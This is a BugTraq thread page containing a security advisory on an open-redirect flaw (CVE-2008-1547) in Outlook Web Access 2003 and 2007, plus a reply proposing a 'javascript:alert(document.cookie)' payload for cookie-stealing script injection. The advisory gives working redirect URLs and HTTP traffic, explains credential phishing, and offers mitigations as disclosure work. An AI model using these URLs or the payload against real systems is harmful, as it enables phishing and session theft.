BugTraq
MS OWA 2003 Redirection Vulnerability Oct 15 2008 09:18AM
Martin Suess (martin suess csnc ch) (2 replies)
Re: MS OWA 2003 Redirection Vulnerability - [MSRC 7368br] Oct 17 2008 07:07PM
Davide Del Vecchio (dante alighieri org) (1 replies)
Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br] Oct 18 2008 06:19PM
Morning Wood (se_cur_ity hotmail com) (1 replies)
Re: MS OWA 2003 Redirection Vulnerability - [MSRC7368br] Oct 19 2008 01:16AM
Davide Dante Del Vecchio (dante alighieri org)
Re: MS OWA 2003 Redirection Vulnerability Oct 15 2008 05:51PM
Stefano Di Paola (stefano dipaola wisec it)
Did you try setting it to :

javascript:alert(document.cookie)

If there are no/dumb filters you'll get

<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<html><head>
<script>
try
{
window.location = "javascript:alert(document.cookie)";
}
catch(e){}
</script>
</head>
</html>

which is better than a simple redirection.

Sorry but at the moment I cannot check it by myself.

Cheers,
Stefano

Il giorno mer, 15/10/2008 alle 11.18 +0200, Martin Suess ha scritto:
> #############################################################
> #
> # COMPASS SECURITY ADVISORY
> # http://www.csnc.ch/en/downloads/advisories.html
> #
> #############################################################
> #
> # Product: Outlook Web Access for Exchange 2003
> # Vendor: Microsoft (www.microsoft.com)
> # CVD ID: CVE-2008-1547
> # Subject: URL Redirection Vulnerability
> # Risk: Medium
> # Effect: Remotely exploitable
> # Author: Martin Suess <martin.suess (at) csnc (dot) ch [email concealed]>
> # Date: October 15th 2008
> #
> #############################################################
>
> Introduction:
> -------------
> The vulnerability found targets the Outlook Web Access application
> for Microsoft Exchange 2003. A valid user can be redirected to a
> malicious website when clicking on a specially crafted URL which can
> be sent to the user by email. If the user is logged in,
> he is redirected instantly - if he is not logged in yet, the login page
> will be displayed and he will be redirected after successful login.
> This vulnerability can be used to redirect the user to a phishing
> website which shows the (faked) login screen and getting the users
> logon credentials as soon as he tries to log in on the faked site.
>
> Affected:
> ---------
> - All tested versions that are vulnerable
> Microsoft Outlook Web Access for Exchange 2003 Server
> (Version: 6.5, Build: 7638.2 SP2)
> - All tested versions that are not vulnerable
> [no more tested]
> - Not affected according to vendor:
> Microsoft Outlook Web Access for Exchange 2007 Server, SP1
>
> Technical Description:
> ----------------------
> An attacker can craft a URL for the OWA of his victim which contains a
> redirection URL to which the user is sent after successful login. This
> URL can be sent to the victim by mail to either a private address or to
> the Exchange business account. Once he clicks on the URL he is
> redirected to a malicious website an attacker prepared containing a
> faked logon screen saying "your session has expired" or similar. If the
> user tries to log in again (on the faked logon page) his credentials
> are compromised.
>
> Outlook Web Access for Exchange 2003
>
> The URL could look like this:
> https://webmail.domain.tld/exchweb/bin/redir.asp?URL=http://www.csnc.ch
>
> We request the page (authenticated user):
> GET
> https://webmail.domain.tld/exchweb/bin/redir.asp?URL=http://www.csnc.ch
> HTTP/1.1
> Host: webmail.domain.tld
> User-Agent: Mozilla/5.0 (Windows) Gecko/20080201 Firefox/2.0.0.12
> Accept: text/xml,application/xml,application/xhtml+xml
> Accept-Language: en-us,en;q=0.5
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
>
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0
> X-Powered-By: ASP.NET
> Date: Fri, 28 Mar 2008 08:54:10 GMT
>
> <!--Copyright (c) 2000-2003 Microsoft Corporation. All rights reserved.-->
> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
> <html>
> <head>
> <script>
> try
> {
> window.location = "http:\/\/www.csnc.ch";
> }
> catch(e){}
> </script>
> </head>
> </html>
>
> If the user is not authorized he will be redirected automatically to
> the following URL:
> https://webmail.domain.tld/exchweb/bin/auth/owalogon.asp?url=
> https://webmail.domain.tld/exchweb/bin/redir.asp%3FURL=
> http://www.csnc.ch&reason=0
>
> As soon as he authenticates successfully he is redirected to the
> foreign website as well.
>
> Outlook Web Access for Exchange 2007
>
> Nearly the same issue can be found in Outlook Web Access for Exchange
> 2007. The URL additionally contains an additional parameter C which is
> needed because otherwise the page warns that a foreign website is
> opened. If the parameter is there, we are not warned when we are
> redirected:
>
> https://webmail.domain.tld/owa/redir.aspx?
> C=efb6ad0a2be24a368596c275b5e4ae8d&URL=http%3a%2f%2fwww.csnc.ch%2f
>
> Still, if we leave it away, it's only a pop-up which is clicked
> away and the redirection is still done.
>
> If the user is not logged on when he clicks on the specially crafted
> URL, he is also redirected to the logon screen and redirected after
> successful login (including the warning pop-up):
>
> https://webmail.domain.tld/owa/auth/logon.aspx?url=
> https://webmail.domain.tld/owa/redir.aspx%3F
> C=asdf%26URL=http%253a%252f%252f
> www.csnc.ch%252f&reason=0
>
> According to Microsoft, Outlook Web Access 2007 SP1 is not affected.
> as it will not allow a link to point to inside the OWA URL namespace.
>
> Workaround / Fix:
> -----------------
> Patching the application would mean that no more redirections to
> foreign websites are allowed anymore at all.
> A more sophisticated way of redirection would be to add a unique
> random id to each redirection URL which is connected to the session
> id and the URL. The URL does NOT contain the foreign URL anymore - it
> is only stored in the session. If the unique id does not match the URL
> stored in the session database the redirection is denied. Upon all
> redirections to foreign websites the user is warned with a pop-up.
> This does not solve the problem completely however because URLs sent
> to the webmail directly can still lead to malicious websites.
>
> As long as there is no patch available we recommend using a web entry
> server in front of Outlook Web Access which filters malicious URLs.
> Redirection URLs must always start with the FQDN of the webmail
> application:
> https://webmail.domain.tld/exchweb/bin/auth/owalogon.asp?url=
> https://webmail.domain.tld/[...]
>
> Microsoft also states correctly, that after the attack, the browser
> will no longer show the correct URL of the OWA in the address bar.
> The SSL certificate will also change or not be present anymore at
> all, depending on whether the attacker's page is encrypted or not.
>
> Timeline:
> ---------
> Vendor Status: MSRC tracking case closed
> Vendor Notified: March 31st 2008
> Vendor Response: May 6th 2008
> Advisory Release: October 15th 2008
> Patch available: - (vulnerability not high priority)
>
> Acknowledgement:
> ----------------
> -
>
> References:
> -----------
> [1]: http://www.microsoft.com/exchange/
> [2]: http://msexchangeteam.com/archive/2004/07/26/197289.aspx

--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Owasp Italy R&D Director

Web: www.wisec.it
..................

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus